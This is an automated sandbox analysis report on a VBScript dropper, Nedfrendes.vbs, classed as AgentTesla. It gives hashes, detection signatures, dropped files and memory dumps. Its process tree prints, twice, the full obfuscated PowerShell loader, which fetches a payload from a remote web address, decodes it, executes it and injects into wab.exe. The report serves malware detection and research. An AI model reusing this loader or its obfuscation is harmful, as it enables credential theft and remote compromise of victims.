Overview

overview

10

Static

static

1

Nedfrendes.vbs

windows7-x64

10

Nedfrendes.vbs

windows10-2004-x64

10

Analysis

  • max time kernel
    144s
  • max time network
    149s
  • platform
    windows10-2004_x64
  • resource
    win10v2004-20240508-en
  • resource tags

    arch:x64arch:x86image:win10v2004-20240508-enlocale:en-usos:windows10-2004-x64system
  • submitted
    04/06/2024, 01:22

Sharing

Copy URL Twitter E-mail
Report Analysis Logs

General

  • Target

    Nedfrendes.vbs

  • Size

    14KB

  • MD5

    549f7414c0068e703e6d3cb0b030143a

  • SHA1

    aaa6ae647d9758a4ec357f3234b0ac8ec82ddbfa

  • SHA256

    8b0e0980e676bba6b7be8e303bf181fe30963e17af40aba4cf039985f40f355a

  • SHA512

    a642bb48f487bf7e1724c7dec973273dd6050e6f1f513f08133c656f54e400b0f0ebd93bc95e8b2c9040d21172cc807d4e28fe3103624a2e127fcd0408bc0486

  • SSDEEP

    192:uttuEDcnnpck4OF4bZenpkn9unxiJEytkc6iVcTuiXzUKtp:uttlcpckzK9unxvAezUKz

Score
10/10
agentteslakeyloggerspywarestealertrojan

Malware Config

Extracted

Family

agenttesla

Credentials

Signatures

  • AgentTesla

    Agent Tesla is a remote access tool (RAT) written in visual basic.

    keyloggertrojanstealerspywareagenttesla
  • Detect packed .NET executables. Mostly AgentTeslaV4. 2 IoCs
  • Detects binaries (Windows and macOS) referencing many web browsers. Observed in information stealers. 2 IoCs
  • Detects executables referencing Windows vault credential objects. Observed in infostealers 2 IoCs
  • Detects executables referencing many confidential data stores found in browsers, mail clients, cryptocurreny wallets, etc. Observed in information stealers 2 IoCs
  • Detects executables referencing many email and collaboration clients. Observed in information stealers 2 IoCs
  • Detects executables referencing many file transfer clients. Observed in information stealers 2 IoCs
  • Blocklisted process makes network request 1 IoCs
  • Checks computer location settings 2 TTPs 1 IoCs

    Looks up country code configured in the registry, likely geofence.

  • Looks up external IP address via web service 2 IoCs

    Uses a legitimate IP lookup service to find the infected system's external IP.

  • Suspicious use of NtCreateThreadExHideFromDebugger 1 IoCs
  • Suspicious use of NtSetInformationThreadHideFromDebugger 2 IoCs
  • Suspicious use of SetThreadContext 1 IoCs
  • Enumerates physical storage devices 1 TTPs

    Attempts to interact with connected storage/optical drive(s).

  • Suspicious behavior: EnumeratesProcesses 7 IoCs
  • Suspicious behavior: MapViewOfSection 1 IoCs
  • Suspicious use of AdjustPrivilegeToken 3 IoCs
  • Suspicious use of SetWindowsHookEx 1 IoCs
  • Suspicious use of WriteProcessMemory 15 IoCs

Processes

  • C:\Windows\System32\WScript.exe
    "C:\Windows\System32\WScript.exe" "C:\Users\Admin\AppData\Local\Temp\Nedfrendes.vbs"
    1⤵
    • Checks computer location settings
    • Suspicious use of WriteProcessMemory
    PID:736
    • C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
      "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" "$Hotnesses = 1;Function Letsind($Tideless){$Makroredigeringer=$Tideless.Length-$Hotnesses;$Forethoughted='Substring';For( $Labourage=5;$Labourage -lt $Makroredigeringer;$Labourage+=6){$Irreclaimably+=$Tideless.$Forethoughted.Invoke( $Labourage, $Hotnesses);}$Irreclaimably;}function Pert($Fordyrelserne){ . ($Afbankes) ($Fordyrelserne);}$reviewal=Letsind 'U,aakMDel,noBillezBelloiKlasslD ivel,acisaBreec/Aadse5T yll.Fugem0Demop Lnked(Ski.tW BaloiTh,gmnceib,dacarao KasewVibras Mngd ForstNDebatT,vern Grske1Filo 0Afsik.Virkn0Dille;Proco onfiWForbui kalvn Hin 6Monis4 brug;Li.fj Revitx,erop6Un,id4Silde;A gif Fikspr DirevRegav:,erin1Skubb2Borte1Lntag.Ation0Ostr.)Annul HandwGHoloteDonnecOpdknk VaskoOverh/Unsli2Fgtem0C,rpi1Eleva0pap,r0Nonna1Jigab0 Epi.1Hulde CubicFUk,udiBeshirNoncae P,nifGruppo .emaxPhr s/Afgha1Media2Komp 1Overg.H.ved0til m ';$Urbanites=Letsind 'As,ebU,uncas Ind ePansrr Defl-.orgeA CostgHolleeTransnSkakstCtg.h ';$Pjalte=Letsind 'Bret.hSki.tt.ecretSuperpGe ess Admi:Falbe/Bra.r/TilbawBevgewanapswNdhj,. Hyd.iFuldsn Ti,sn R spoTempev Mahaa kirktEmboli teksv ,cieeDisapbChemiu Kun iOptiml Bi,ldR latiShibbnHaardgTige.s agbuoUnlimlH,dsiuOprult igniiOrpheoRel,qnHumlesR gne. Taati,dstdn Insc/Misogw erdep decu-ForsvcSulphoChlo,nReraitendo,eDidy,n Pse.t Fe.e/RgninuUneugp .atalVic noD pola raved Re,es agoo/ rerogDecimrReinfa Detov Potai mau t Gl.kySocio_ EjerfhexapoBlaanrL,xicmPlattsBeund/ H mnhFersk/ Legud B,li/min mbDuper/Reseeg aric/SouseAEdgebrNo chc rupphHalurvTra iiandedsLge.ji BalltMurstoFedmerDupe..OutprcskydeuionisrPolyp ';$Traktementerne=Letsind ' Unvo>God v ';$Afbankes=Letsind 'UnmonicimbreS amexTvang ';$Purposelessly='Minimumslngderne105';$Udfrslers = Letsind 'Appe,eSyntoc,agerh Antiovaado ,ordi% UraeaExocrpSelvbpvoweld,nnekaNonfit TimuaTu.ul% Tegn\underv uinaiMorbrc isimtD lirrSammeeUn hasPei,esEnoli. SpecDTra,duTim tl Maro Forde&fagfo&Subtl DublseQuadrcHjer hSlopsoProje hu kotMonti ';Pert (Letsind 'Teakt$jac agChunal tjero AndebBredsabandalScale:ProprMPersoa Suppk ecanrApp ioSonnenDissoa orsovSmp,snRepubeVkkelsFarma=Baksp( ForecDiaphmU,ormdgkker Lagri/Su.prcTy.eb T.ll$ F reU Kl.dd,appafCatenrRo lls Co,nlPar ietupe,r Met,sWag a)Senne ');Pert (Letsind ' Ti.k$DegaggLejeklKlgtio Stavb Dru.aPercelDotty: nembKInt,rn Sel a H.rmsAktieeMaal.tBlidg=ceint$OlicoPAnnaljnabonaparallUdfoltshoeheHeadr.smrfes UpripSarinlSca,liSupertAmids(Potas$TanisTUnwalrgs ela,stenk IrretTandbeSpjtsmSe,vpeSimpln.roret ConteDorier Un qn DesmeBisam) R,gs ');$Pjalte=$Knaset[0];$Nskeforestillinger= (Letsind 'Lac r$ Bog.gDigitlRreddoM tapb Raa.a Re,alReifi: Uh,iLFiendaBel,tr Pye.dLimfai SocieG odlrIndta=NavneN ppuseSkjo wRugbr-,ukstOGoldebe terjPos.ceFatalc overtd.opk Brn.bSTa,niyScrutsP,ecotResiseSam.lmHabit.UnsizNfletteReinvtSlvvr. CopyWStirreU inobPejseC Udv,l oomii KateeHim.enOve.ot');$Nskeforestillinger+=$Makronavnes[1];Pert ($Nskeforestillinger);Pert (Letsind 'Fo bu$A,delL ,ndeaTilgnrDefild S.apiBlybaeUdd,irTelet.Mu.deHEndege UdfoaSgekrdRejseeCha crSkrfesGrafi[Super$T,ailURkkefrfrih b Bo,ka IschnKonsuischizt Axi.eSplensSkovm]Retsf=Tmmer$ OpvirVidere UlvevLeonii UnsceGossywHa,eraMijnhlPhlog ');$Skansion=Letsind 'yiddi$N ujaLTaxafa RuelrBrebldTitaniknoppe Fes r Sty,.NunnaDDiscooirredwDedicnVersel Hearo S icaDoombdMont,FNaturiFoderlSyntaeR adp(Bev,s$Z uglP BevijRac,saErhvelInosit Vi,keOsteo,Pan i$HaglbSKalcitBro.denepheuTebe.rpadrioH andpAaremaPrint) lige ';$Steuropa=$Makronavnes[0];Pert (Letsind 'Escur$DoktogNewfolAf,beoRatiobGourmaEnasalMiner:nona EAldoxlaldereplanlvMicepa umultQ,esto UnrernatiosVagilt Hjreo IntelClose=Bundg(BenvnTManjeeIntersPseu tUnfor-PagodPimmedaHypottDuodeh R.od Nars$ etanSRein.t rakkeExsiluv,jrprLaaneo Co,opTypeba L.em)Sygej ');while (!$Elevatorstol) {Pert (Letsind 'Pigst$ Flubg Rigsl Kar oornecbEn draAfmejlTabel:IntegTreconrFarmeaUpdrinOveresStubouL.rilbEugensNephet.ngolaRubannUnc mtRenitiChamoa,habbl synllZ,ocyyKrads=Dolo $OratotUncerrUdeeruPoucheMytil ') ;Pert $Skansion;Pert (Letsind 'For jS S mitFagsta F yvrUrf gtRaako-TndevSActinldysk,e PredeBibl.p apst Fr lu4 rocu ');Pert (Letsind ' Frui$ObstegSamm l DomsoP.ecobGa wraenemyl Scor: grocEEnerglSex.leDop iv antaDodokt Fr.coPl,ssrFilmks Afstt Opd.oS,enul Vaes=carbo(InforTAccepePrjsesRommatGaleo- gyroPTitanablandtEndrohBista Toldo$Hlka.SHirdmtexsufeRonkeuStie rKnucloTekstpSa.doaHerb.)Hyper ') ;Pert (Letsind 'Plusv$CompogMaa el E.ico Vibrb Scy.aF,onelArbor: ffaP A,esrNedl oEasygo A gifA.strnDarwieDoubtsRmebrs Tild=Over $ kemagAndrolChalioAksembFe,aea keralGramm:KjortdEpidei RadilPraireMullitRegr tDyrehaR,mstnFamilt Rub iBihulsSa kthMolar+Me,se+ enil% lddy$UdraaKStr,nnUdefia CentsRideseAd pttnon p.ar ejcToustoDistauSparsnSildetEpiph ') ;$Pjalte=$Knaset[$Proofness];}$Genudsendelses=293407;$Falmningens=30098;Pert (Letsind 'O eri$Sup,rgMorphlS.pploKvintbAktioaHoppel arat:S,iriRGodvii SupegLachrsFormidForbra ArmegGyl.esfusenmBiosan ,ultdAmal,e Mos nEkspleKlu.t Exo a=Carot Taa,nGSpreaeHalvftBesu.-ApoteCNri go Adj.nKir.etClavieA vignRi.tat.onde U.gra$S urnSBrugetMorgee Cla u No,srDuriao Purip.ogitaUdkog ');Pert (Letsind 'S,dde$OmstdgVengel CateoFictib ambra Kinllbedst:KvoteAOv ennTon,tt AccuiUdhalgS.umbrPositaUnso.mFejesmenglea DagstStraiiFordrcsosteainelol.arti Ledo= Da a Decel[Skde,SspuliyKlbehsSkatktSub.eeSolskmOnfre.ratelCP.scao T lenUngdov DataeKadarrCen.rtAnbef]Vitam:Kryst:graveF ViperParasoSdm.fmTele.BFish,aProclsBeforeNaboe6Lysti4 .verSs aggtBrndbrsmutti.uffinProtog Suic(Fryde$CanasRSkandiJordsgUndersgarladSta da LdstgHalsss udgm,lerdnKu etdHandleGaardnKons ePriso)Sleep ');Pert (Letsind '.aktu$ ThrogFurenl.orstoCel.ubThoraa .asslRall : Pap.F ,odeo ArgytGlosshCasseeEskadrChauvgIncoriBn.eslIn bilIgleraSe,ue Imdek=Arveo Misa[MandeS Kdf.yTilgisRagsotA,diteUnconmTerne.PolieTA.asteudk.pxPh totEkstr. B skEJ rdonTe,olc,ragtoSpg,rdR.bboiTrioinOocysgOsmir]Diffe:Stati: KlimA umuSNicotC talIFiredISlett.In knGBritoe SucrtSu,prSNonfotOndinrEquilifintenstnksgLyop (Diplo$EjerfAFor,an utletSuperi,eopogFruitrSmaasarimetmSystemLejeka,rbeetCranriNotarcBerl,aIn,fllBi,ta)Psoad ');Pert (Letsind ' Pent$ gonogCorynlKuvero ChaobStagnaTerpelLa er:SkrogHSp ctaBidenlBobblvFuglepCowboeA istnUdtrysPr,toiblyinoPr.donPeptoe.arkinLodsb=Neant$EmulsFYngveoBegratPi tihUndere A.oerPlumrghoodliIndenlF,omml GlobaC ast. W,edsKloakuSoftwbL,skns Konst HandrRegeniTaxamnSystegDokto(Asyla$,ustvGSklenepulven ImpruStoredStyr,sUnseneSarkinMoerid StateKraftlFuldlsHare,eOve,wsT,pir,t.avl$ ,adeFNovemaI erslP sitm RubinSmreri PelsnEmpirgImineeAzo,ynQuantsFi,al) Kors ');Pert $Halvpensionen;"
      2⤵
      • Blocklisted process makes network request
      • Suspicious behavior: EnumeratesProcesses
      • Suspicious use of AdjustPrivilegeToken
      • Suspicious use of WriteProcessMemory
      PID:2480
      • C:\Windows\system32\cmd.exe
        "C:\Windows\system32\cmd.exe" /c "echo %appdata%\victress.Dul && echo t"
        3⤵
          PID:1772
        • C:\Windows\syswow64\WindowsPowerShell\v1.0\powershell.exe
          "C:\Windows\syswow64\WindowsPowerShell\v1.0\powershell.exe" "$Hotnesses = 1;Function Letsind($Tideless){$Makroredigeringer=$Tideless.Length-$Hotnesses;$Forethoughted='Substring';For( $Labourage=5;$Labourage -lt $Makroredigeringer;$Labourage+=6){$Irreclaimably+=$Tideless.$Forethoughted.Invoke( $Labourage, $Hotnesses);}$Irreclaimably;}function Pert($Fordyrelserne){ . ($Afbankes) ($Fordyrelserne);}$reviewal=Letsind 'U,aakMDel,noBillezBelloiKlasslD ivel,acisaBreec/Aadse5T yll.Fugem0Demop Lnked(Ski.tW BaloiTh,gmnceib,dacarao KasewVibras Mngd ForstNDebatT,vern Grske1Filo 0Afsik.Virkn0Dille;Proco onfiWForbui kalvn Hin 6Monis4 brug;Li.fj Revitx,erop6Un,id4Silde;A gif Fikspr DirevRegav:,erin1Skubb2Borte1Lntag.Ation0Ostr.)Annul HandwGHoloteDonnecOpdknk VaskoOverh/Unsli2Fgtem0C,rpi1Eleva0pap,r0Nonna1Jigab0 Epi.1Hulde CubicFUk,udiBeshirNoncae P,nifGruppo .emaxPhr s/Afgha1Media2Komp 1Overg.H.ved0til m ';$Urbanites=Letsind 'As,ebU,uncas Ind ePansrr Defl-.orgeA CostgHolleeTransnSkakstCtg.h ';$Pjalte=Letsind 'Bret.hSki.tt.ecretSuperpGe ess Admi:Falbe/Bra.r/TilbawBevgewanapswNdhj,. Hyd.iFuldsn Ti,sn R spoTempev Mahaa kirktEmboli teksv ,cieeDisapbChemiu Kun iOptiml Bi,ldR latiShibbnHaardgTige.s agbuoUnlimlH,dsiuOprult igniiOrpheoRel,qnHumlesR gne. Taati,dstdn Insc/Misogw erdep decu-ForsvcSulphoChlo,nReraitendo,eDidy,n Pse.t Fe.e/RgninuUneugp .atalVic noD pola raved Re,es agoo/ rerogDecimrReinfa Detov Potai mau t Gl.kySocio_ EjerfhexapoBlaanrL,xicmPlattsBeund/ H mnhFersk/ Legud B,li/min mbDuper/Reseeg aric/SouseAEdgebrNo chc rupphHalurvTra iiandedsLge.ji BalltMurstoFedmerDupe..OutprcskydeuionisrPolyp ';$Traktementerne=Letsind ' Unvo>God v ';$Afbankes=Letsind 'UnmonicimbreS amexTvang ';$Purposelessly='Minimumslngderne105';$Udfrslers = Letsind 'Appe,eSyntoc,agerh Antiovaado ,ordi% UraeaExocrpSelvbpvoweld,nnekaNonfit TimuaTu.ul% Tegn\underv uinaiMorbrc isimtD lirrSammeeUn hasPei,esEnoli. SpecDTra,duTim tl Maro Forde&fagfo&Subtl DublseQuadrcHjer hSlopsoProje hu kotMonti ';Pert (Letsind 'Teakt$jac agChunal tjero AndebBredsabandalScale:ProprMPersoa Suppk ecanrApp ioSonnenDissoa orsovSmp,snRepubeVkkelsFarma=Baksp( ForecDiaphmU,ormdgkker Lagri/Su.prcTy.eb T.ll$ F reU Kl.dd,appafCatenrRo lls Co,nlPar ietupe,r Met,sWag a)Senne ');Pert (Letsind ' Ti.k$DegaggLejeklKlgtio Stavb Dru.aPercelDotty: nembKInt,rn Sel a H.rmsAktieeMaal.tBlidg=ceint$OlicoPAnnaljnabonaparallUdfoltshoeheHeadr.smrfes UpripSarinlSca,liSupertAmids(Potas$TanisTUnwalrgs ela,stenk IrretTandbeSpjtsmSe,vpeSimpln.roret ConteDorier Un qn DesmeBisam) R,gs ');$Pjalte=$Knaset[0];$Nskeforestillinger= (Letsind 'Lac r$ Bog.gDigitlRreddoM tapb Raa.a Re,alReifi: Uh,iLFiendaBel,tr Pye.dLimfai SocieG odlrIndta=NavneN ppuseSkjo wRugbr-,ukstOGoldebe terjPos.ceFatalc overtd.opk Brn.bSTa,niyScrutsP,ecotResiseSam.lmHabit.UnsizNfletteReinvtSlvvr. CopyWStirreU inobPejseC Udv,l oomii KateeHim.enOve.ot');$Nskeforestillinger+=$Makronavnes[1];Pert ($Nskeforestillinger);Pert (Letsind 'Fo bu$A,delL ,ndeaTilgnrDefild S.apiBlybaeUdd,irTelet.Mu.deHEndege UdfoaSgekrdRejseeCha crSkrfesGrafi[Super$T,ailURkkefrfrih b Bo,ka IschnKonsuischizt Axi.eSplensSkovm]Retsf=Tmmer$ OpvirVidere UlvevLeonii UnsceGossywHa,eraMijnhlPhlog ');$Skansion=Letsind 'yiddi$N ujaLTaxafa RuelrBrebldTitaniknoppe Fes r Sty,.NunnaDDiscooirredwDedicnVersel Hearo S icaDoombdMont,FNaturiFoderlSyntaeR adp(Bev,s$Z uglP BevijRac,saErhvelInosit Vi,keOsteo,Pan i$HaglbSKalcitBro.denepheuTebe.rpadrioH andpAaremaPrint) lige ';$Steuropa=$Makronavnes[0];Pert (Letsind 'Escur$DoktogNewfolAf,beoRatiobGourmaEnasalMiner:nona EAldoxlaldereplanlvMicepa umultQ,esto UnrernatiosVagilt Hjreo IntelClose=Bundg(BenvnTManjeeIntersPseu tUnfor-PagodPimmedaHypottDuodeh R.od Nars$ etanSRein.t rakkeExsiluv,jrprLaaneo Co,opTypeba L.em)Sygej ');while (!$Elevatorstol) {Pert (Letsind 'Pigst$ Flubg Rigsl Kar oornecbEn draAfmejlTabel:IntegTreconrFarmeaUpdrinOveresStubouL.rilbEugensNephet.ngolaRubannUnc mtRenitiChamoa,habbl synllZ,ocyyKrads=Dolo $OratotUncerrUdeeruPoucheMytil ') ;Pert $Skansion;Pert (Letsind 'For jS S mitFagsta F yvrUrf gtRaako-TndevSActinldysk,e PredeBibl.p apst Fr lu4 rocu ');Pert (Letsind ' Frui$ObstegSamm l DomsoP.ecobGa wraenemyl Scor: grocEEnerglSex.leDop iv antaDodokt Fr.coPl,ssrFilmks Afstt Opd.oS,enul Vaes=carbo(InforTAccepePrjsesRommatGaleo- gyroPTitanablandtEndrohBista Toldo$Hlka.SHirdmtexsufeRonkeuStie rKnucloTekstpSa.doaHerb.)Hyper ') ;Pert (Letsind 'Plusv$CompogMaa el E.ico Vibrb Scy.aF,onelArbor: ffaP A,esrNedl oEasygo A gifA.strnDarwieDoubtsRmebrs Tild=Over $ kemagAndrolChalioAksembFe,aea keralGramm:KjortdEpidei RadilPraireMullitRegr tDyrehaR,mstnFamilt Rub iBihulsSa kthMolar+Me,se+ enil% lddy$UdraaKStr,nnUdefia CentsRideseAd pttnon p.ar ejcToustoDistauSparsnSildetEpiph ') ;$Pjalte=$Knaset[$Proofness];}$Genudsendelses=293407;$Falmningens=30098;Pert (Letsind 'O eri$Sup,rgMorphlS.pploKvintbAktioaHoppel arat:S,iriRGodvii SupegLachrsFormidForbra ArmegGyl.esfusenmBiosan ,ultdAmal,e Mos nEkspleKlu.t Exo a=Carot Taa,nGSpreaeHalvftBesu.-ApoteCNri go Adj.nKir.etClavieA vignRi.tat.onde U.gra$S urnSBrugetMorgee Cla u No,srDuriao Purip.ogitaUdkog ');Pert (Letsind 'S,dde$OmstdgVengel CateoFictib ambra Kinllbedst:KvoteAOv ennTon,tt AccuiUdhalgS.umbrPositaUnso.mFejesmenglea DagstStraiiFordrcsosteainelol.arti Ledo= Da a Decel[Skde,SspuliyKlbehsSkatktSub.eeSolskmOnfre.ratelCP.scao T lenUngdov DataeKadarrCen.rtAnbef]Vitam:Kryst:graveF ViperParasoSdm.fmTele.BFish,aProclsBeforeNaboe6Lysti4 .verSs aggtBrndbrsmutti.uffinProtog Suic(Fryde$CanasRSkandiJordsgUndersgarladSta da LdstgHalsss udgm,lerdnKu etdHandleGaardnKons ePriso)Sleep ');Pert (Letsind '.aktu$ ThrogFurenl.orstoCel.ubThoraa .asslRall : Pap.F ,odeo ArgytGlosshCasseeEskadrChauvgIncoriBn.eslIn bilIgleraSe,ue Imdek=Arveo Misa[MandeS Kdf.yTilgisRagsotA,diteUnconmTerne.PolieTA.asteudk.pxPh totEkstr. B skEJ rdonTe,olc,ragtoSpg,rdR.bboiTrioinOocysgOsmir]Diffe:Stati: KlimA umuSNicotC talIFiredISlett.In knGBritoe SucrtSu,prSNonfotOndinrEquilifintenstnksgLyop (Diplo$EjerfAFor,an utletSuperi,eopogFruitrSmaasarimetmSystemLejeka,rbeetCranriNotarcBerl,aIn,fllBi,ta)Psoad ');Pert (Letsind ' Pent$ gonogCorynlKuvero ChaobStagnaTerpelLa er:SkrogHSp ctaBidenlBobblvFuglepCowboeA istnUdtrysPr,toiblyinoPr.donPeptoe.arkinLodsb=Neant$EmulsFYngveoBegratPi tihUndere A.oerPlumrghoodliIndenlF,omml GlobaC ast. W,edsKloakuSoftwbL,skns Konst HandrRegeniTaxamnSystegDokto(Asyla$,ustvGSklenepulven ImpruStoredStyr,sUnseneSarkinMoerid StateKraftlFuldlsHare,eOve,wsT,pir,t.avl$ ,adeFNovemaI erslP sitm RubinSmreri PelsnEmpirgImineeAzo,ynQuantsFi,al) Kors ');Pert $Halvpensionen;"
          3⤵
          • Suspicious use of NtSetInformationThreadHideFromDebugger
          • Suspicious use of SetThreadContext
          • Suspicious behavior: EnumeratesProcesses
          • Suspicious behavior: MapViewOfSection
          • Suspicious use of AdjustPrivilegeToken
          • Suspicious use of WriteProcessMemory
          PID:2896
          • C:\Windows\SysWOW64\cmd.exe
            "C:\Windows\system32\cmd.exe" /c "echo %appdata%\victress.Dul && echo t"
            4⤵
              PID:3424
            • C:\Program Files (x86)\windows mail\wab.exe
              "C:\Program Files (x86)\windows mail\wab.exe"
              4⤵
              • Suspicious use of NtCreateThreadExHideFromDebugger
              • Suspicious use of NtSetInformationThreadHideFromDebugger
              • Suspicious behavior: EnumeratesProcesses
              • Suspicious use of AdjustPrivilegeToken
              • Suspicious use of SetWindowsHookEx
              PID:3156

      Network

            MITRE ATT&CK Enterprise v15

            Replay Monitor

            Loading Replay Monitor...

            Downloads

            • C:\Users\Admin\AppData\Local\Temp\__PSScriptPolicyTest_zpntj2na.3ry.ps1
              Filesize

              60B

              MD5

              d17fe0a3f47be24a6453e9ef58c94641

              SHA1

              6ab83620379fc69f80c0242105ddffd7d98d5d9d

              SHA256

              96ad1146eb96877eab5942ae0736b82d8b5e2039a80d3d6932665c1a4c87dcf7

              SHA512

              5b592e58f26c264604f98f6aa12860758ce606d1c63220736cf0c779e4e18e3cec8706930a16c38b20161754d1017d1657d35258e58ca22b18f5b232880dec82

              Download Submit

            • C:\Users\Admin\AppData\Roaming\victress.Dul
              Filesize

              421KB

              MD5

              e55f25384365d8cb1cc6ffb71600ff50

              SHA1

              ffe4f34c419fd6dba313e21d53ce9b7ed309ee80

              SHA256

              d83c4794938826611110d3b660ae9876a5c17f8254f258cf4f64889db2c47b5e

              SHA512

              7f62e819c75ca50deb502dbf6b8301f926ef125d04ae0806cf50d9a76a31eddeb59142035a0e622e70e941b80769ee54abc1a64d4474f0a0ebba2023b988342c

              Download Submit

            • memory/2480-6-0x000002B8FE090000-0x000002B8FE0B2000-memory.dmp

              Filesize

              136KB

              Download

            • memory/2480-11-0x00007FFE7EF60000-0x00007FFE7FA21000-memory.dmp

              Filesize

              10.8MB

              Download

            • memory/2480-12-0x00007FFE7EF60000-0x00007FFE7FA21000-memory.dmp

              Filesize

              10.8MB

              Download

            • memory/2480-53-0x00007FFE7EF60000-0x00007FFE7FA21000-memory.dmp

              Filesize

              10.8MB

              Download

            • memory/2480-40-0x00007FFE7EF60000-0x00007FFE7FA21000-memory.dmp

              Filesize

              10.8MB

              Download

            • memory/2480-0-0x00007FFE7EF63000-0x00007FFE7EF65000-memory.dmp

              Filesize

              8KB

              Download

            • memory/2480-39-0x00007FFE7EF63000-0x00007FFE7EF65000-memory.dmp

              Filesize

              8KB

              Download

            • memory/2896-17-0x0000000005E70000-0x0000000005E92000-memory.dmp

              Filesize

              136KB

              Download

            • memory/2896-19-0x00000000060B0000-0x0000000006116000-memory.dmp

              Filesize

              408KB

              Download

            • memory/2896-30-0x00000000066F0000-0x000000000670E000-memory.dmp

              Filesize

              120KB

              Download

            • memory/2896-31-0x0000000006720000-0x000000000676C000-memory.dmp

              Filesize

              304KB

              Download

            • memory/2896-32-0x0000000007F80000-0x00000000085FA000-memory.dmp

              Filesize

              6.5MB

              Download

            • memory/2896-33-0x0000000006C70000-0x0000000006C8A000-memory.dmp

              Filesize

              104KB

              Download

            • memory/2896-34-0x00000000079A0000-0x0000000007A36000-memory.dmp

              Filesize

              600KB

              Download

            • memory/2896-35-0x0000000007930000-0x0000000007952000-memory.dmp

              Filesize

              136KB

              Download

            • memory/2896-36-0x0000000008BB0000-0x0000000009154000-memory.dmp

              Filesize

              5.6MB

              Download

            • memory/2896-25-0x0000000006120000-0x0000000006474000-memory.dmp

              Filesize

              3.3MB

              Download

            • memory/2896-38-0x0000000009160000-0x000000000CEFE000-memory.dmp

              Filesize

              61.6MB

              Download

            • memory/2896-18-0x0000000005F10000-0x0000000005F76000-memory.dmp

              Filesize

              408KB

              Download

            • memory/2896-16-0x00000000057C0000-0x0000000005DE8000-memory.dmp

              Filesize

              6.2MB

              Download

            • memory/2896-15-0x0000000005150000-0x0000000005186000-memory.dmp

              Filesize

              216KB

              Download

            • memory/3156-50-0x0000000000EA0000-0x0000000000EE0000-memory.dmp

              Filesize

              256KB

              Download

            • memory/3156-49-0x0000000000EA0000-0x00000000020F4000-memory.dmp

              Filesize

              18.3MB

              Download

            • memory/3156-48-0x0000000000EA0000-0x00000000020F4000-memory.dmp

              Filesize

              18.3MB

              Download

            • memory/3156-55-0x0000000024950000-0x00000000249A0000-memory.dmp

              Filesize

              320KB

              Download

            • memory/3156-56-0x0000000024A40000-0x0000000024AD2000-memory.dmp

              Filesize

              584KB

              Download

            • memory/3156-57-0x0000000024940000-0x000000002494A000-memory.dmp

              Filesize

              40KB

              Download